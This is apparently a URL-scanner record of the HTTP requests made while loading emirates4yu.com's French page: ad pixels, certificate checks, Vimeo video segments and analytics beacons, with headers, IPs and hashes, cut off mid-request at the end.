googleads.g.doubleclick.net/pagead/viewthroughconversion/942127788/?random=1669377722080&cv=11&fst=1669377722080&bg=ffffff&guid=ON&async=1>m=2wgb90&u_w=1280&u_h=1024&hn=www.googleadservices.com&frm=0&url=https%3A%2F%2Femirates4yu.com%2Ffr%2F&tiba=Cr%C3%A9ation%20d%E2%80%99entreprise%20%C3%A0%20Duba%C3%AF%20%7C%20Emirates%204%20You&auid=385243053.1669377722&rfmt=3&fmt=4
142.250.74.34200 OK 903 B URL HTTP/2 googleads.g.doubleclick.net/pagead/viewthroughconversion/942127788/?random=1669377722080&cv=11&fst=1669377722080&bg=ffffff&guid=ON&async=1>m=2wgb90&u_w=1280&u_h=1024&hn=www.googleadservices.com&frm=0&url=https%3A%2F%2Femirates4yu.com%2Ffr%2F&tiba=Cr%C3%A9ation%20d%E2%80%99entreprise%20%C3%A0%20Duba%C3%AF%20%7C%20Emirates%204%20You&auid=385243053.1669377722&rfmt=3&fmt=4
IP 142.250.74.34:0
File type ASCII text, with very long lines (1915), with no line terminators
Hash 0cefab80b3360efcf3e12cb0d18a6868
d3d21cf15f150a7e11560036d793d5456a6a1add
ae27cba3d8e55a18bcad9ba0656c1352fc954ea36d58b7b86d6ba483066513e6
GET /pagead/viewthroughconversion/942127788/?random=1669377722080&cv=11&fst=1669377722080&bg=ffffff&guid=ON&async=1>m=2wgb90&u_w=1280&u_h=1024&hn=www.googleadservices.com&frm=0&url=https%3A%2F%2Femirates4yu.com%2Ffr%2F&tiba=Cr%C3%A9ation%20d%E2%80%99entreprise%20%C3%A0%20Duba%C3%AF%20%7C%20Emirates%204%20You&auid=385243053.1669377722&rfmt=3&fmt=4 HTTP/1.1
Host: googleads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
p3p: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
date: Fri, 25 Nov 2022 12:02:02 GMT
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
cache-control: no-cache, must-revalidate
content-type: text/javascript; charset=UTF-8
x-content-type-options: nosniff
content-disposition: attachment; filename="f.txt"
content-encoding: br
server: cafe
content-length: 903
x-xss-protection: 0
set-cookie: test_cookie=CheckForPermission; expires=Fri, 25-Nov-2022 12:17:02 GMT; path=/; domain=.doubleclick.net; Secure; SameSite=none
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
ocsp.pki.goog/s/gts1d4/QNGijQL5IyE
142.250.74.3200 OK 471 B URL HTTP/1.1 ocsp.pki.goog/s/gts1d4/QNGijQL5IyE
IP 142.250.74.3:0
Hash 61517fa91f17a258efc6790dec509bef
e20b96cea0c630268639d9159171d8e935b9466e
910460925ed4f86f978933432494558f5138858024546331ece9c492c3dd49a0
POST /s/gts1d4/QNGijQL5IyE HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Fri, 25 Nov 2022 12:02:02 GMT
Cache-Control: public, max-age=14400
Server: scaffolding on HTTPServer2
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/s/gts1d4/QNGijQL5IyE
142.250.74.3200 OK 471 B URL HTTP/1.1 ocsp.pki.goog/s/gts1d4/QNGijQL5IyE
IP 142.250.74.3:0
Hash 61517fa91f17a258efc6790dec509bef
e20b96cea0c630268639d9159171d8e935b9466e
910460925ed4f86f978933432494558f5138858024546331ece9c492c3dd49a0
POST /s/gts1d4/QNGijQL5IyE HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Fri, 25 Nov 2022 12:02:02 GMT
Cache-Control: public, max-age=14400
Server: scaffolding on HTTPServer2
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
156vod-adaptive.akamaized.net/exp=1669381621~acl=%2Ff7711139-0188-45a1-a390-cbc4d6fb4063%2F%2A~hmac=5b76108d4c4cd6912ca21ec155a4146ca201ba437d19c295f78181ead24e39ca/f7711139-0188-45a1-a390-cbc4d6fb4063/sep/audio/3922791d/chop/segment-1.m4s?r=dXM%3D
23.36.76.194200 OK 105 kB URL HTTP/1.1 156vod-adaptive.akamaized.net/exp=1669381621~acl=%2Ff7711139-0188-45a1-a390-cbc4d6fb4063%2F%2A~hmac=5b76108d4c4cd6912ca21ec155a4146ca201ba437d19c295f78181ead24e39ca/f7711139-0188-45a1-a390-cbc4d6fb4063/sep/audio/3922791d/chop/segment-1.m4s?r=dXM%3D
IP 23.36.76.194:0
ASN #20940 Akamai International B.V.
Size 105 kB (105161 bytes)
Hash 5b269110301e18c943c6103b2808ca76
734f31e85ad62f26ab3a22ba1e99b39c2b237ff2
a6c6f06a8a1f38b1d4f305d424aa53969122ff0202ae47077685f5cf77c8b049
GET /exp=1669381621~acl=%2Ff7711139-0188-45a1-a390-cbc4d6fb4063%2F%2A~hmac=5b76108d4c4cd6912ca21ec155a4146ca201ba437d19c295f78181ead24e39ca/f7711139-0188-45a1-a390-cbc4d6fb4063/sep/audio/3922791d/chop/segment-1.m4s?r=dXM%3D HTTP/1.1
Host: 156vod-adaptive.akamaized.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://player.vimeo.com
Connection: keep-alive
Referer: https://player.vimeo.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/1.1 200 OK
Content-Length: 105161
using-starlord: true
origin-retrieved-hour: 1657832400
Access-Control-Max-Age: 86400
timing-allow-origin: *
Aka-c-hit: cache-hit
Cache-Control: max-age=31536000
Date: Fri, 25 Nov 2022 12:02:02 GMT
Connection: keep-alive
Akamai-Mon-Iucid-Del: 877678
Alt-Svc: h3-Q050=":443"; ma=93600,quic=":443"; ma=93600; v="46,43"
Content-Type: video/mp4
AK-REFERENCE-ID: 0.be4c2417.1669377722.324214e
X-VIM-CACHEBC: EP:H11,E:m,TD0:m,CW:h
Access-Control-Expose-Headers: Akamai-Edge-IP, X-VIM-CACHEBC, X-Akamai-Request-ID, AK-REFERENCE-ID
Akamai-Edge-IP: 23.36.76.194
Access-Control-Allow-Headers: Content-Type, Accept-Encoding, Range, X-OTT-Agent,CMCD-Request,CMCD-Object,CMCD-Status,CMCD-Session
Access-Control-Allow-Origin: *
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 472 B IP 142.250.74.3:0
Hash d3d2d21ac304813a16da64921ce18ba4
98b1762c675c61eeb18254986461e6b1074ebc92
af00429c189464ddb8df704dc48035421f943444df6ca17390fb97466c2e7e9b
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Fri, 25 Nov 2022 12:02:02 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
fresnel.vimeocdn.com/add/player-stats?beacon=1&session-id=c98e53c98c80d233cfcd6a42aef33723cc2fb6321669377721
34.120.202.204200 OK 0 B URL HTTP/2 fresnel.vimeocdn.com/add/player-stats?beacon=1&session-id=c98e53c98c80d233cfcd6a42aef33723cc2fb6321669377721
IP 34.120.202.204:0
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
POST /add/player-stats?beacon=1&session-id=c98e53c98c80d233cfcd6a42aef33723cc2fb6321669377721 HTTP/1.1
Host: fresnel.vimeocdn.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: text/plain;charset=UTF-8
Content-Length: 1423
Origin: https://player.vimeo.com
Connection: keep-alive
Referer: https://player.vimeo.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
access-control-allow-credentials: true
access-control-allow-origin: https://player.vimeo.com
date: Fri, 25 Nov 2022 12:02:03 GMT
content-length: 0
via: 1.1 google
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
X-Firefox-Spdy: h2
fresnel.vimeocdn.com/add/player-test-impression?beacon=1
34.120.202.204200 OK 0 B URL HTTP/2 fresnel.vimeocdn.com/add/player-test-impression?beacon=1
IP 34.120.202.204:0
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
POST /add/player-test-impression?beacon=1 HTTP/1.1
Host: fresnel.vimeocdn.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: text/plain;charset=UTF-8
Content-Length: 116
Origin: https://player.vimeo.com
Connection: keep-alive
Referer: https://player.vimeo.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
access-control-allow-credentials: true
access-control-allow-origin: https://player.vimeo.com
date: Fri, 25 Nov 2022 12:02:03 GMT
content-length: 0
via: 1.1 google
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
X-Firefox-Spdy: h2
fresnel.vimeocdn.com/add/player-stats?beacon=1&session-id=c98e53c98c80d233cfcd6a42aef33723cc2fb6321669377721
34.120.202.204200 OK 0 B URL HTTP/2 fresnel.vimeocdn.com/add/player-stats?beacon=1&session-id=c98e53c98c80d233cfcd6a42aef33723cc2fb6321669377721
IP 34.120.202.204:0
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
POST /add/player-stats?beacon=1&session-id=c98e53c98c80d233cfcd6a42aef33723cc2fb6321669377721 HTTP/1.1
Host: fresnel.vimeocdn.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: text/plain;charset=UTF-8
Content-Length: 1715
Origin: https://player.vimeo.com
Connection: keep-alive
Referer: https://player.vimeo.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
access-control-allow-credentials: true
access-control-allow-origin: https://player.vimeo.com
date: Fri, 25 Nov 2022 12:02:03 GMT
content-length: 0
via: 1.1 google
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
X-Firefox-Spdy: h2
player-telemetry.vimeo.com/player-events/log/play
34.120.202.204200 OK 0 B URL HTTP/2 player-telemetry.vimeo.com/player-events/log/play
IP 34.120.202.204:0
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
POST /player-events/log/play HTTP/1.1
Host: player-telemetry.vimeo.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: text/plain;charset=UTF-8
Content-Length: 650
Origin: https://player.vimeo.com
Connection: keep-alive
Referer: https://player.vimeo.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-site
HTTP/2 200 OK
access-control-allow-credentials: true
access-control-allow-origin: https://player.vimeo.com
content-type: text/html; charset=UTF-8
date: Fri, 25 Nov 2022 12:02:03 GMT
content-length: 0
via: 1.1 google
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 471 B IP 142.250.74.3:0
Hash 163d4912a06d8358abc770dc0351d7b4
1e8dc04b95e704679ab729f81716466ea8a3e591
72245d178d481350af611804e557032ffb7bb3a3e8cdb83f3332a5ffba78d193
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Fri, 25 Nov 2022 12:02:03 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
stats.g.doubleclick.net/j/collect?t=dc&aip=1&_r=3&v=1&_v=j98&tid=UA-72772477-1&cid=1802790675.1669377722&jid=1581618082&gjid=832908569&_gid=116220358.1669377722&_u=YADAAAAAAAAAAC~&z=585780717
142.251.1.155200 OK 4 B URL HTTP/2 stats.g.doubleclick.net/j/collect?t=dc&aip=1&_r=3&v=1&_v=j98&tid=UA-72772477-1&cid=1802790675.1669377722&jid=1581618082&gjid=832908569&_gid=116220358.1669377722&_u=YADAAAAAAAAAAC~&z=585780717
IP 142.251.1.155:0
File type ASCII text, with no line terminators
Hash 48c0473b7821185d937e685216e2168b
3743e47f8a429a5e87b86cb582d78940733d9d2e
570c4d4674fd20602189c548c145ba1f8ac34bc2e4599a71471969028aa1e25a
POST /j/collect?t=dc&aip=1&_r=3&v=1&_v=j98&tid=UA-72772477-1&cid=1802790675.1669377722&jid=1581618082&gjid=832908569&_gid=116220358.1669377722&_u=YADAAAAAAAAAAC~&z=585780717 HTTP/1.1
Host: stats.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: text/plain
Content-Length: 0
Origin: https://emirates4yu.com
Connection: keep-alive
Referer: https://emirates4yu.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
access-control-allow-origin: https://emirates4yu.com
strict-transport-security: max-age=10886400; includeSubDomains; preload
date: Fri, 25 Nov 2022 12:02:03 GMT
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
cache-control: no-cache, no-store, must-revalidate
last-modified: Sun, 17 May 1998 03:00:00 GMT
access-control-allow-credentials: true
x-content-type-options: nosniff
content-type: text/plain
cross-origin-resource-policy: cross-origin
server: Golfe2
content-length: 4
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
ocsp.pki.goog/s/gts1d4/QNGijQL5IyE
142.250.74.3200 OK 471 B URL HTTP/1.1 ocsp.pki.goog/s/gts1d4/QNGijQL5IyE
IP 142.250.74.3:0
Hash 61517fa91f17a258efc6790dec509bef
e20b96cea0c630268639d9159171d8e935b9466e
910460925ed4f86f978933432494558f5138858024546331ece9c492c3dd49a0
POST /s/gts1d4/QNGijQL5IyE HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Fri, 25 Nov 2022 12:02:03 GMT
Cache-Control: public, max-age=14400
Server: scaffolding on HTTPServer2
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
www.google.no/pagead/1p-user-list/942127788/?random=1669377722080&cv=11&fst=1669377600000&bg=ffffff&guid=ON&async=1>m=2wgb90&u_w=1280&u_h=1024&frm=0&url=https%3A%2F%2Femirates4yu.com%2Ffr%2F&tiba=Cr%C3%A9ation%20d%E2%80%99entreprise%20%C3%A0%20Duba%C3%AF%20%7C%20Emirates%204%20You&fmt=3&is_vtc=1&random=537023477&rmt_tld=1&ipr=y
142.250.74.3200 OK 42 B URL HTTP/2 www.google.no/pagead/1p-user-list/942127788/?random=1669377722080&cv=11&fst=1669377600000&bg=ffffff&guid=ON&async=1>m=2wgb90&u_w=1280&u_h=1024&frm=0&url=https%3A%2F%2Femirates4yu.com%2Ffr%2F&tiba=Cr%C3%A9ation%20d%E2%80%99entreprise%20%C3%A0%20Duba%C3%AF%20%7C%20Emirates%204%20You&fmt=3&is_vtc=1&random=537023477&rmt_tld=1&ipr=y
IP 142.250.74.3:0
File type GIF image data, version 89a, 1 x 1\012- data
Hash d89746888da2d9510b64a9f031eaecd5
d5fceb6532643d0d84ffe09c40c481ecdf59e15a
ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629
GET /pagead/1p-user-list/942127788/?random=1669377722080&cv=11&fst=1669377600000&bg=ffffff&guid=ON&async=1>m=2wgb90&u_w=1280&u_h=1024&frm=0&url=https%3A%2F%2Femirates4yu.com%2Ffr%2F&tiba=Cr%C3%A9ation%20d%E2%80%99entreprise%20%C3%A0%20Duba%C3%AF%20%7C%20Emirates%204%20You&fmt=3&is_vtc=1&random=537023477&rmt_tld=1&ipr=y HTTP/1.1
Host: www.google.no
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
date: Fri, 25 Nov 2022 12:02:03 GMT
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
cache-control: no-cache, no-store, must-revalidate
content-type: image/gif
content-security-policy: script-src 'none'; object-src 'none'
x-content-type-options: nosniff
server: cafe
content-length: 42
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
ocsp.pki.goog/s/gts1d4/QNGijQL5IyE
142.250.74.3200 OK 471 B URL HTTP/1.1 ocsp.pki.goog/s/gts1d4/QNGijQL5IyE
IP 142.250.74.3:0
Hash 61517fa91f17a258efc6790dec509bef
e20b96cea0c630268639d9159171d8e935b9466e
910460925ed4f86f978933432494558f5138858024546331ece9c492c3dd49a0
POST /s/gts1d4/QNGijQL5IyE HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Fri, 25 Nov 2022 12:02:03 GMT
Cache-Control: public, max-age=14400
Server: scaffolding on HTTPServer2
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
156vod-adaptive.akamaized.net/exp=1669381621~acl=%2Ff7711139-0188-45a1-a390-cbc4d6fb4063%2F%2A~hmac=5b76108d4c4cd6912ca21ec155a4146ca201ba437d19c295f78181ead24e39ca/f7711139-0188-45a1-a390-cbc4d6fb4063/sep/video/d7f2cc29/chop/segment-1.m4s?r=dXM%3D
23.36.76.194200 OK 204 kB URL HTTP/1.1 156vod-adaptive.akamaized.net/exp=1669381621~acl=%2Ff7711139-0188-45a1-a390-cbc4d6fb4063%2F%2A~hmac=5b76108d4c4cd6912ca21ec155a4146ca201ba437d19c295f78181ead24e39ca/f7711139-0188-45a1-a390-cbc4d6fb4063/sep/video/d7f2cc29/chop/segment-1.m4s?r=dXM%3D
IP 23.36.76.194:0
ASN #20940 Akamai International B.V.
Size 204 kB (204224 bytes)
Hash 657fe7363a85b854664d3cc520e5759d
5b31e0b006285c9a6ff63fe9f853d607b1cdcf19
d1aa50adb037cb35189f03f0351a2c61b3551bbe40c45ae4e275ac7df861820e
GET /exp=1669381621~acl=%2Ff7711139-0188-45a1-a390-cbc4d6fb4063%2F%2A~hmac=5b76108d4c4cd6912ca21ec155a4146ca201ba437d19c295f78181ead24e39ca/f7711139-0188-45a1-a390-cbc4d6fb4063/sep/video/d7f2cc29/chop/segment-1.m4s?r=dXM%3D HTTP/1.1
Host: 156vod-adaptive.akamaized.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://player.vimeo.com
Connection: keep-alive
Referer: https://player.vimeo.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/1.1 200 OK
Content-Length: 204224
using-starlord: true
origin-retrieved-hour: 1657832400
Access-Control-Max-Age: 86400
timing-allow-origin: *
Aka-c-hit: cache-hit
Cache-Control: max-age=31536000
Date: Fri, 25 Nov 2022 12:02:03 GMT
Connection: keep-alive
Akamai-Mon-Iucid-Del: 877678
Alt-Svc: h3-Q050=":443"; ma=93600,quic=":443"; ma=93600; v="46,43"
Content-Type: video/mp4
AK-REFERENCE-ID: 0.be4c2417.1669377723.324215c
X-VIM-CACHEBC: EP:H11,E:m,TD0:m,CW:h
Access-Control-Expose-Headers: Akamai-Edge-IP, X-VIM-CACHEBC, X-Akamai-Request-ID, AK-REFERENCE-ID
Akamai-Edge-IP: 23.36.76.194
Access-Control-Allow-Headers: Content-Type, Accept-Encoding, Range, X-OTT-Agent,CMCD-Request,CMCD-Object,CMCD-Status,CMCD-Session
Access-Control-Allow-Origin: *
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 471 B IP 142.250.74.3:0
Hash 163d4912a06d8358abc770dc0351d7b4
1e8dc04b95e704679ab729f81716466ea8a3e591
72245d178d481350af611804e557032ffb7bb3a3e8cdb83f3332a5ffba78d193
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Fri, 25 Nov 2022 12:02:03 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
156vod-adaptive.akamaized.net/exp=1669381621~acl=%2Ff7711139-0188-45a1-a390-cbc4d6fb4063%2F%2A~hmac=5b76108d4c4cd6912ca21ec155a4146ca201ba437d19c295f78181ead24e39ca/f7711139-0188-45a1-a390-cbc4d6fb4063/sep/video/3922791d/chop/segment-1.m4s?r=dXM%3D
23.36.76.194200 OK 344 kB URL HTTP/1.1 156vod-adaptive.akamaized.net/exp=1669381621~acl=%2Ff7711139-0188-45a1-a390-cbc4d6fb4063%2F%2A~hmac=5b76108d4c4cd6912ca21ec155a4146ca201ba437d19c295f78181ead24e39ca/f7711139-0188-45a1-a390-cbc4d6fb4063/sep/video/3922791d/chop/segment-1.m4s?r=dXM%3D
IP 23.36.76.194:0
ASN #20940 Akamai International B.V.
Size 344 kB (343902 bytes)
Hash b96cc4e63b47363f1d8fa153d67a5126
24e9c8f4059d647c3a29eb948e699163ffff3917
8c8f4f02b0623d93977120ed8fd8b4553196d98d09b129e678028942e3d92188
GET /exp=1669381621~acl=%2Ff7711139-0188-45a1-a390-cbc4d6fb4063%2F%2A~hmac=5b76108d4c4cd6912ca21ec155a4146ca201ba437d19c295f78181ead24e39ca/f7711139-0188-45a1-a390-cbc4d6fb4063/sep/video/3922791d/chop/segment-1.m4s?r=dXM%3D HTTP/1.1
Host: 156vod-adaptive.akamaized.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://player.vimeo.com
Connection: keep-alive
Referer: https://player.vimeo.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/1.1 200 OK
Content-Length: 343902
using-starlord: true
origin-retrieved-hour: 1657962000
Access-Control-Max-Age: 86400
timing-allow-origin: *
Aka-c-hit: cache-hit
Cache-Control: max-age=31535958
Date: Fri, 25 Nov 2022 12:02:03 GMT
Connection: keep-alive
Akamai-Mon-Iucid-Del: 877678
Alt-Svc: h3-Q050=":443"; ma=93600,quic=":443"; ma=93600; v="46,43"
Content-Type: video/mp4
AK-REFERENCE-ID: 0.be4c2417.1669377723.324216d
X-VIM-CACHEBC: EP:H11,E:m,TD0:m,CW:h
Access-Control-Expose-Headers: Akamai-Edge-IP, X-VIM-CACHEBC, X-Akamai-Request-ID, AK-REFERENCE-ID
Akamai-Edge-IP: 23.36.76.194
Access-Control-Allow-Headers: Content-Type, Accept-Encoding, Range, X-OTT-Agent,CMCD-Request,CMCD-Object,CMCD-Status,CMCD-Session
Access-Control-Allow-Origin: *
region1.google-analytics.com/g/collect?v=2&tid=G-ZH335RKFLP>m=2oeb90&_p=863136926&cid=1802790675.1669377722&ul=en-us&sr=1280x1024&_s=1&sid=1669377722&sct=1&seg=0&dl=https%3A%2F%2Femirates4yu.com%2Ffr%2F&dt=Cr%C3%A9ation%20d%E2%80%99entreprise%20%C3%A0%20Duba%C3%AF%20%7C%20Emirates%204%20You&en=page_view&_fv=1&_nsi=1&_ss=1
216.239.32.36204 No Content 0 B URL HTTP/2 region1.google-analytics.com/g/collect?v=2&tid=G-ZH335RKFLP>m=2oeb90&_p=863136926&cid=1802790675.1669377722&ul=en-us&sr=1280x1024&_s=1&sid=1669377722&sct=1&seg=0&dl=https%3A%2F%2Femirates4yu.com%2Ffr%2F&dt=Cr%C3%A9ation%20d%E2%80%99entreprise%20%C3%A0%20Duba%C3%AF%20%7C%20Emirates%204%20You&en=page_view&_fv=1&_nsi=1&_ss=1
IP 216.239.32.36:0
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
POST /g/collect?v=2&tid=G-ZH335RKFLP>m=2oeb90&_p=863136926&cid=1802790675.1669377722&ul=en-us&sr=1280x1024&_s=1&sid=1669377722&sct=1&seg=0&dl=https%3A%2F%2Femirates4yu.com%2Ffr%2F&dt=Cr%C3%A9ation%20d%E2%80%99entreprise%20%C3%A0%20Duba%C3%AF%20%7C%20Emirates%204%20You&en=page_view&_fv=1&_nsi=1&_ss=1 HTTP/1.1
Host: region1.google-analytics.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://emirates4yu.com
